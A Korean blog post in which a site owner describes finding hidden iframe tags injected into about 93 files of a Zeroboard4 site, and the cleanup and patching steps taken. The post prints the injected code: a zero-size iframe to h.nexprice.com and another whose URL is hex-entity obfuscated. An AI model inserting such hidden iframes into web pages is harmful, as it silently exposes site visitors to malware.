제로보드4, 해킹으로 iframe 테그 h.nexprice.com 삽입되는 문제점과 해결책

 
반응형
개인 홈페이지가 얼마전부터 로딩이 느리고 제 홈페이지에 들어가면 V3는 안그러지만, 알약에서 치명적인 바이러스에 걸렸다고 뜨더군요...



그러더니 어느날부터는 아예 홈페이지 접속이 안되는데, 하단에보니 http://apple.chol.com/xml/index.html 을 기다리는 중이라고 뜨더군요...
저런 코드가 내 홈페이지에 있을리가 없는데???

간만에 ftp로 접속을 해서 보니 php, php3, htm, html 파일의
제일끝부분에 아래와 같은 코드들이 삽입되어 있습니다.

<iframe src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x68;&#x6F;&#x6C;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x78;&#x6D;&#x6C;&#x2F;&#x69;&#x6E;&#x64;&#x65;&#x78;&#x2E;&#x68;&#x74;&#x6D;&#x6C; width=2 height=2></iframe>

<iframe src="http://h.nexprice.com/css/x.htm" width=0 height=0></iframe>

호스팅업체에 물어보니 ftp 비밀번호가 유출되어서 이런 현상이 발생한것 같다고 해서,
ftp 비밀번호를 변경을 했고, 파일의 수정은 직접 해야 한다고 하더군요...-_-;;



처음에는 위처럼 index.htm 와 같은 파일 몇개만 변경된줄 알았는데,
변경후에 찾아보니 100여개의 파일이 변경된듯 합니다...
그것도 이곳저곳이 수정되어서 일일히 디렉토리에 들어가보니도 힘듭니다...-_-++

결론적으로 ftp 비밀번호와는 상관없이 zeroboard4의 취약점을 통한 공격이라고 하는데,

http://www.xpressengine.com/zb4_security/19346851
http://www.xpressengine.com/19349545

위 사이트에서 설명한데로 수정을 해주시면 됩니다.

그리고  zetyx_group_table 라는 테이블에도 이상한 항목이 삽입되니, 해당 자료를 삭제해 주어야 합니다.
테이블은 지우면 안되고, phpmyadmin 같은 프로그램이나 호스팅업체에 문의를 해서 해당 자료만 삭제하면 됩니다.


이후에 초기화면이 백지화되는 현상이 발생할수도 있는데,

Zeroboard(제로보드) 보안패치와 메인화면 백지화 문제
위 글을 참고해서 _head.php 파일의 끝부분만 변경해주시면 되는듯 합니다.

호스팅업체에서는 제로보드가 이제는 배포도 중지되었고,
보안에 취약하니 XE나 다른 프로그램을 이용하라고 하는데,

뭐 telnet이나 정규식을 잘 이용하면 간단한 방법으로 해결이 될수도 있을지 모르겠지만,
저는 미련한 방식으로 접근을 했습니다...-_-;;

암튼 기존의 파일을 수정해야 하는데, 결국에는 ftp에서 통채로 자료를 받아왔습니다.
그리고 나서 file Finder나 검색 프로그램을 이용해서 nexprice라는 검색어로 조회를 해보니 무려 93개의 파일이 변경이 되었습니다...



(물론 검색어는 해킹으로 삽입된 내용에 따라 다를수있습니다.)

저 파일들을 수정하는 방법은 editplus와 같은 에디터 프로그램을 이용하면 쉽게 수정을 할수 있습니다.



위 파일들을 editplus에서 끌어와서 바꾸기 기능을 통해서
열려진 모든파일을 변경하면 변경은 한방에 끝낼수 있습니다.


그리고 위의 검색 프로그램을 이용해서 다운받은 파일들을 전부 조회한후에
날짜순으로 조회를 해서 조금전에 변경된 파일을 제외하고는 삭제를 하면 변경된 파일만 남게됩니다.



그리고나서 다시 ftp 프로그램으로 변경된 파일을 모두 덮어쓰기로 올리시면 끝입니다.

암튼 참 번거로운 작업인데, 앞으로도 또 이러한 현상이 벌어질수 있는데,
다른 게시판으로 갈아타야할지, 어떨찌 고민이 되네요....

그 수많은 자료를 쉽게 변환을 할수 있을지... 고민 좀 해보아야 할듯 합니다. 
반응형